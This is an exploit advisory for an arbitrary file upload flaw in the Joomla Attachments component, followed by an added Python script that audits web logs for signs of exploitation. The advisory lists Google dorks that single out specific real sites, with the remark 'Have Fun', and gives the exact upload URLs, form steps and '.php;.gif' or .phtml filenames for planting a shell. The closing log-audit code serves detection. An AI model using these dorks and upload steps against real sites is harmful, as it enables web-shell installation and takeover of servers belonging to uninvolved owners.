####################################################################

# Exploit Title : Joomla Com_Attachments Components 3.x Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 26/05/2019
# Vendor Homepage : jmcameron.net
# Software Download Links :
jmcameron.net/attachments/
jmcameron.net/attachments/updates/3.2.6/attachments-3.2.6.zip
joomlacode.org/gf/download/frsrelease/18688/83852/attachments-2.2.2.zip
joomlacode.org/gf/project/attachments/frs/
github.com/sdc/DevonStudioSchool/tree/master/administrator/components/com_attachments/
# Software Information Links :
extensions.joomla.org/extension/attachments/
joomlacode.org/gf/project/attachments/
joomlacode.org/gf/project/attachments3/
# Joomla Affected Versions :
Joomla 3.4.8
Joomla 3.5.1
Joomla 3.6.5
Joomla 3.8.1
Joomla 3.8.11
Joomla 3.8.3
Joomla 3.9.6
# Software Affected Versions [ Component Com_Attachments ] : 2.2.2 and 3.2.6 - 3.x / All previous versions.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks :
inurl:/index.php?option=com_attachments&task=upload
intext:Copyright (C) 2006-2020 BSA Troop 444. All Rights Reserved.
intext:Treadmill Desk from TrekDesk
intext:Copyright © 2015 Ashleigh-D. All rights reserved. Website designed by Mojosync Pty Ltd using Joomla
intext:Fundación Jesuitas Paraguay
intext:© 2019 Mars Society Polska
intext:Designed by atict.com
intext:Copyright © 2017. All Rights Reserved.Webaloss - Realizzazione siti webwebaloss.com
intext:Designed by Burosphere.
intext:Conselho Nacional de Recursos Hídricos CNRH Ministerio Do Desenvolvimento Regional
and more on Google and other Search Engines...... Have Fun....
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link [ Similar ] : dl.packetstormsecurity.net/1902-exploits/joomlaattachments326-shell.txt

####################################################################

# Description about Software :
***************************
The 'Attachments' extension allows files to be uploaded and attached to content articles in Joomla. It includes a plugin to display attachments and a component for uploading and managing attachments.

####################################################################

# Impact :
***********
Joomla Attachments Components 3.x and other previous versions could allow a remote attacker to upload arbitrary files (including a shell), caused by improper validation of file extensions in multiple scripts reached through index.php.

The issue occurs because the application fails to adequately sanitize user-supplied input. Exploiting this issue will allow attackers to execute arbitrary code within the context of the affected application. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

By sending a specially-crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious PHP script, which could allow the attacker to execute arbitrary PHP code on the vulnerable system.
####################################################################

# Arbitrary File Upload/Unauthorized File Insertion Exploit :
****************************************************
/index.php?option=com_attachments&task=upload&uri=file&parent_id=1&parent_type=com_content&tmpl=component&from=closeme

/index.php?option=com_attachments&task=upload&uri=file&parent_id=[ARTICLE-ID-NUMBER]/&parent_type=com_content&tmpl=component&from=closeme

- Click to "Select file to upload instead"
- Fill the Form
- Published => "Yes" and Click "Public"
- Attach file: Upload your .txt .jpg .gif .png .phtml .php;.gif file to the vulnerable system.

# Directory File Path :
********************
/attachments/article/[ARTICLE-ID-NUMBER]/kingskrupellos.txt

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################
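
Added example, not part of the original advisory and not the component's own code: a defender-side audit of web access logs that flags hits on the upload form URL and requests for stored attachments whose name carries an executable extension in any segment (the `.phtml` and `.php;.gif` cases above). The function names, the EXEC_EXT list, the combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed list of extensions a PHP-enabled server may execute; adjust to the server's handler config.
EXEC_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}
# Storage path from the advisory: /attachments/article/<id>/<file> (search allows subdirectory installs).
STORED = re.compile(r"/attachments/article/\d+/([^/]+)$")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def risky_name(filename):
    """True if any dot- or semicolon-separated segment after the first is executable."""
    parts = re.split(r"[.;]", filename.lower())
    return any(p.strip() in EXEC_EXT for p in parts[1:])

def classify(line):
    """Return 'upload-form', 'stored-executable' or None for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    query = parse_qs(url.query)
    if query.get("option") == ["com_attachments"] and query.get("task") == ["upload"]:
        return "upload-form"
    stored = STORED.search(unquote(url.path))
    if stored and risky_name(stored.group(1)):
        return "stored-executable"
    return None

def audit(lines):
    """Return (finding, line) pairs for every flagged log line, in input order."""
    return [(kind, line) for line in lines if (kind := classify(line))]

# Constructed sample lines (documentation IP ranges, hypothetical file names).
SAMPLE = [
    '198.51.100.7 - - [26/May/2019:10:00:01 +0000] "GET /index.php?option=com_attachments'
    '&task=upload&uri=file&parent_id=1&parent_type=com_content&tmpl=component&from=closeme HTTP/1.1" 200 5120',
    '198.51.100.7 - - [26/May/2019:10:00:40 +0000] "GET /attachments/article/1/notes.php;.gif HTTP/1.1" 200 64',
    '203.0.113.9 - - [26/May/2019:10:02:11 +0000] "GET /attachments/article/12/report.pdf HTTP/1.1" 200 20480',
    '203.0.113.9 - - [26/May/2019:10:03:05 +0000] "GET /attachments/article/12/photo.phtml HTTP/1.1" 200 128',
    '203.0.113.9 - - [26/May/2019:10:04:00 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for kind, line in audit(SAMPLE):
        print(kind, "|", line)
```

A "stored-executable" hit with a 200 status is the finding to triage first, since it means a file with an executable name segment was served from the attachments directory.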